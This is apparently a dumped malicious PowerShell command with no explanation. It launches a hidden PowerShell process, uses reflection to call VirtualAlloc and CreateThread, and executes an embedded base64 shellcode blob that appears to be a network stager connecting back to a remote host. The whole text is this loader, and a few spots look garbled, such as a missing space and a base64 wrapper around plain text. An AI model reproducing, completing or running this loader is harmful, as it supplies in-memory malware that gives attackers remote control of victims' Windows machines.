Dumped again

1. if([IntPtr]::Size -eq 4) {$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'}; $s=New-Object System.Diagnostics.ProcessStartInfo; $s.FileName=$b; $s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[ Convert]::FromBase64String(''function fFab {
2. Param ($yIrH8ai, $xkyy2)
3. $dehvz4cwkal = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
4.  
5. return $dehvz4cwkal.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($dehvz4cwkal.GetMethod('GetModuleHandle')).Invoke($null, @($yIrH8ai)))), $xkyy2))
6. }
7.  
8. function piyhkMzBxT {
9. Param (
10. [Parameter(Position = 0, Mandatory = $True)] [Type[]] $hzhm8fX,
11. [Parameter(Position = 1)] [Type] $lii = [Void]
12. )
13.  
14. $sUZhB04 = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
15. $sUZhB04.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $hzhm8fX).SetImplementationFlags('Runtime, Managed')
16. $sUZhB04.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $lii, $hzhm8fX).SetImplementationFlags('Runtime, Managed')
17.  
18. return $sUZhB04.CreateType()
19. }
20.  
21. [Byte[]]$vg7Ag_BQd4 = [System.Convert]::FromBase64String("/EiB5PD////ozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSDHAUFBJx8QCAMAJQVRJieRMifFBukx3Jgf/1UyJ6mgBAQAAWUG6KYBrAP/VagJZUFBNMclNMcBI/8BIicJBuuoP3+D/1UiJx2oQQVhMieJIiflBusLbN2f/1Ugx0kiJ+UG6t+k4///VTTHASDHSSIn5Qbp07Dvh/9VIiflIicdBunVuTWH/1UiBxLACAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//VSIPEIF5qQEFZaAAQAABBWEiJ8kgxyUG6WKRT5f/VSInDSYnHTTHJSYnwSInaSIn5QboC2chf/9VIAcNIKcZIhfZ14UH/51g=")
22.  
23. $xx6 = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((fFab kernel32.dll VirtualAlloc), (piyhkMzBxT @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $vg7Ag_BQd4.Length,0x3000, 0x40)
24. [System.Runtime.InteropServices.Marshal]::Copy($vg7Ag_BQd4, 0, $xx6, $vg7Ag_BQd4.length)
25.  
26. $ttjpPFG3gpx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((fFab kernel32.dll CreateThread), (piyhkMzBxT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$xx6,[IntPtr]::Zero,0,[IntPtr]::Zero)
27. [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((fFab kernel32.dll WaitForSingleObject), (piyhkMzBxT @([IntPtr], [Int32]))).Invoke($ttjpPFG3gpx,0xffffffff) | Out-Null''));IEX (New-Object IO.StreamReader(New-ObjectIO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();'; $s.UseShellExecute=$false; $s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);